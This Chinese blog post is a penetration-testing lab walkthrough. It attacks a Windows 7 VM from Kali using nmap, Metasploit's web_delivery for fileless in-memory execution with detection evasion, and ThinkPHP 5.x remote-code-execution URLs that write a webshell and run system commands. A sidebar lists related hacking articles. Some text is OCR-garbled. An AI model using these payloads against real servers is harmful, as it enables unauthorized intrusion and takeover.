目标攻击漏洞获取目标机器最高权限

最新推荐文章于 2023-05-25 10:10:23 发布
最新推荐文章于 2023-05-25 10:10:23 发布
阅读量1.6k 收藏 3
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjxsir/article/details/111512984
版权

目标攻击漏洞获取目标机器最高权限

目标站点

target: win7x64 192.168.123.1 60[DHCP]

attack: kali-linux 192.168.123.136

方法一:通过web站点,使用无文件的方式攻去利用执行

方法二:通过web站点, 上传webshell,返回給msf

方法三:攻击其他端口服务,拿到meterpreterc

信息收集总在前- nmap端口扫描

root@kali:~# nmap -sV -T4 192.168.123.160

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-17 15:20 CST

Nmap scan report for 192.168.123.160

Host is up (0.00057s latency).

Not shown: 988 closed ports

PORTSTATE SERVICEVERSION

80/tcpopen http

Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j mod fcgid/2.3.9)

135/tcp open msrpcMicrosoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft- ds (workgroup: WORKGROUP)3306/tcp open mysqlMySQL (unauthorized)

MAC Address: 00:0C:29:7C:DA:E3 (VMware)

Service Info: Host: USER-20181210Fl; OS: Windows; CРE: cpe:/o:microsoft:windows

方法一

➢访问web站点,寻找漏洞点

http://192.168.1 23.160/dvwa/vulnerabilities/exec/#

➢如何利用?

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web. delivery就派上用场。web delivery的主要目的是快速和受害者主机建立一条session。 当受害者主机存在比如命令注入、远程命令执行等问题时.攻击者可以使用web delivery生成的一条命令建立连接。

另外web_ delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。

web delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过settarget 0或1或2来设置是使用php还是python还是powershel等。

方法二

➢访问web站点,寻找漏洞点http://192.168.123.160/html/public/

使用ThinkPHP V5.1软件

➢如何利用-写入webshell

http://192.168.123.160/html/public/index.php?

s=indexNthink\template\driver\file/write&.cacheFile= phpinfo.php&content= %3C?php%20phpinfo();?%3E

➢如何利用-连接webshell-.上传后门文件

在这里插入图片描述

➢找到漏洞利用点

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本)远程命令执行漏洞利用(GetShell)

http://192.168.123.160/html/public/index.php?s= /index/\think\app/invokefunction&function=call user func_ array&vars[0]=system&vars[1][=whoami

http://192.168.123.160/html/public/index. php?s= /index/\think\request/cache&key= whoamilsystem
请不要干坏事哦~~

白玉瑕
关注
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2441
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
利用 ARM 核间调试漏洞获得 SoC 硬件最高权限(上)
niuchuangxinan的博客
02-07 1261
Nailgun Attack 攻击原理和攻击步骤
内网渗透 -- 获取内网中其他主机权限
weixin_41489908的博客
07-04 2409
每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.144 小小受:win7 x64 ,ip: 192.168.1.130 一、生成木马及监听主机参考上篇文章: 二、获取小受的IP地址 meterpreter > getsystem ...
测试xss如何获得目标机器系统权限
weixin_34221112的博客
06-24 637
author:RootkitHat.Org 有装B的嫌疑,但是你如何得知你的目标用什么系统和什么浏览器 相似的工具这里有一个:http://xss-proxy.sourceforge.net 附件: Parh /sploits/2011/06/XSSF.zip 解压后吧附件全部复制到 /msf3/里面 启动metasploit ,创建数据库,并且载入插件 ...
[Hack The Box] HTB—Paper walkthrough
ShenZ的博客
02-26 1689
[Hack The Box] HTB—Paper walkthrough HTB—Paper [Hack The Box] HTB—Paper walkthrough 一、信息搜集 X-Backend-Server 二、网站渗透 bot leads to LFI 三、提权 **Wappalyzer** 探测出是 **`WordPress CMS`** 版本`5.2.3` 搜到一个未授权漏洞[CVE-2019-17671:Wordpress未授权访问漏洞复现 ]
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3383
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
深度神经网络的目标化木马攻击方法及其实验验证
113198TBT:使用BitT rojan的目标神经网络攻击Adnan Siraj Rakin,Zhezhi He和Deliang Fan电气,计算机和能源工程学院,亚利桑那州立大学,坦佩,AZ 85287dfan@asu.edu摘要现代深度神经网络(DNN)的安全性受到严格...
Windows系统近年漏洞概况及攻击教程防御
qq_55163354的博客
08-05 3603
参考:《2018年Windows平台漏洞年度报告》 什么是漏洞漏洞是在硬软件,协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。例如OpenSSL心脏出血漏洞,Badlock Bug,Stagefright等。 漏洞危害: 从小方面来讲,漏洞曝光后被不法使用会危害个人用户的隐私安全与财产安全。从大方面来讲,一些漏洞就是在网络方面的战略武器。(所以有自己国家的设备系统,芯片等真的很重要。国外有很多先例,我们可以作参考,但核心的东西必须自己有) 具体
kali linux渗透攻击基于漏洞工具Metasploit
最新发布
xiaoma920的博客
05-25 811
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
openssl 1.0.2 漏洞修复指南
桀骜不逊
04-03 8366
项目初衷 因为Openssl1.0.2版本,官方已不再维护开源版本。Openssl-1.0.2u为最新的1.0.2正式发布的开源版本。 但是,Openssl-1.0.2u后续又爆出了一些漏洞,官方又不再维护,如何解决这些漏洞呢? 1. 大版本升级,升级到1.1.1系列,或者3.x.x版本。 2. 将漏洞修复代码合入到1.0.2u,继续使用1.0.2u。 考虑到项目中使用openssl大版本升级影响较大,项目中依赖openssl的原有模块都需要修改并重新编译。所以,本文重点介绍第二种解决方案。 Openss
升级openssl版本修复高危漏洞——“OpenSSL红色警戒”漏洞
weixin_34043301的博客
11-27 1367
背景: 近日OpenSSL官方发布了一个影响广泛的远程匿名拒绝服务漏洞漏洞代号:SSL Death Alert”,漏洞编号:CVE-2016-8610) ,即“OpenSSL红色警戒”漏洞,利用该漏洞攻击者可通过多个连接重复发送大量重叠警告包,使服务或进程陷入无意义的循环,从而导致占用掉服务或进程100%的CPU使用率,导致拒绝服务。 该漏洞会...
openssl 版本_漏洞通告 | OpenSSL 拒绝服务漏洞(CVE20201971)
weixin_39779530的博客
12-22 1528
漏洞背景2020年12月08日,OpenSSL官方发布安全公告,披露CVE-2020-1971 OpenSSL GENERAL_NAME_cmp拒绝服务漏洞。OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。漏洞描述2020年12月08日,OpenSSL官方发布安全公告,披露CVE...
OpenSSL发布了2个高危漏洞的补丁程序
w3cschools的博客
03-29 470
OpenSSL的维护者已经发布了针对其软件中的两个高度严重的安全漏洞的修复程序,该漏洞可被利用来进行拒绝服务(DoS)攻击并绕过证书验证。 跟踪为CVE-2021-3449和CVE-2021-3450,这两个漏洞已在周四发布的更新程序(OpenSSL 1.1.1k版)中得到解决。虽然CVE-2021-3449影响所有OpenSSL 1.1.1版本,但CVE-2021-3450影响OpenSSL版本1.1.1h及更高版本。 OpenSSL是一个由加密功能组成的软件库,这些加密功能实现了传输层安全协议,
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4055
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战
Kali与编程
09-11 3303
一、背景介绍 在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习! 二、资源装备 1.安装好Kali Linux的虚拟机一台; 2.已经被控制的Windows主机一个; 3.整装待发的小白一个。 三、战略安排 3.1查看kali虚拟机sessions状况,如下图所示。 命令:sessions c 3.2 在受害者主机执
python如何获取权限_某云平台渗透之-python shell获取root权限
weixin_39950764的博客
11-24 730
2018年的第一天,祝大家365天元气满满!话不多说,先打响新年第一炮(不好意思,我又污了=.=)***本系列内容仅用于技术分享,请勿对号入座***之前有讲过要分享一些云平台渗透的经验,其中最有意思的就属这个python shell了。首先经过fuzzing发现了这样一个console口:根据路径判断,这个应该是python的交互式shell,也就是我们平时在cmd命令行敲“python”之后出来...
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞获取webshell。目前使用流行架构,特别是一键式部署的系统
20、漏洞利用:WebShell利用原理,黑客是如何拿下最高权限
郭盛华的CSDN技术博客
10-14 2198
主讲老师:郭盛华 什么是WebShell ? webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 今天就给大...
利用粘滞键漏洞获取管理员权限的技巧
"粘滞键漏洞是Windows操作系统中...粘滞键漏洞是一种严重的安全威胁,它利用了Windows系统设计的一个特性,给不法分子提供了获取管理员权限的捷径。用户和管理员都应当提高警惕,采取适当的措施保护系统免受此类攻击
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值